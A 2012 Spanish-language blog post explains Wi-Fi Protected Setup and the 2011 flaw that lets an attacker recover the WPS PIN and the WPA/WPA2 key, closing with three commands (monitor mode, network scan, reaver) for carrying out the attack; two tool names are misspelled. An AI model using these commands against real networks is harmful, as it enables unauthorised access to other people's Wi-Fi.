martes, 25 de septiembre de 2012

Vulnerabilidad de WPA por WPS habilitado


    Wi-Fi Protected Setup o WPS es un estándar con el que se quiere facilitar la puesta en marcha de una red segura.
    La idea de WPS no es la de añadir más seguridad a las redes, sino facilitar el uso de los mecanismos existentes, como WPA o WPA2, a los usuarios sin necesidad de utilizar complicadas claves o tediosos procesos de configuración (por lo visto).
    Existen dos métodos básicos para el funcionamiento de WPS:
    El primero de ellos es la introducción de un PIN. En este, cuando se detecta un nuevo dispositivo Wi-Fi en la red, el punto de acceso (o un representante autorizado de este, como podría ser un ordenador con los permisos adecuados) nos pedirá el PIN del dispositivo.
    El segundo de los métodos es el PBC o Push Button Configuration, que facilita todavía más el proceso, pues solo requiere que se pulse un botón en el punto de acceso y otro en el dispositivo que queramos unir a la red.
Una falla de seguridad descubierta en diciembre del 2011 por Stefan Viehböck y Craig Heffnet, la cual afecta a routers inalámbricos que tienen la función WPS, la misma que en dispositivos actuales se encuentra habilitada por defecto. La falla permite a un atacante recuperar el PIN WPS y con la misma la clave pre-compartida de la red WPA/WPA2 en pocas horas.
En definitiva, para conseguir saltarnos este mecanismo sería tan sencillo como poner nuestra tarjeta de red en modo monitor
#arimon-ng start wlan0
Para realizar el ataque necesitaremos conocer el BSSID y la MAC del router
#ariodump-ng mon0
Y por ultimo, utilizando reaver conseguiremos acceso:
#reaver -i mon0 -b [MAC] -vv

No hay comentarios:

Publicar un comentario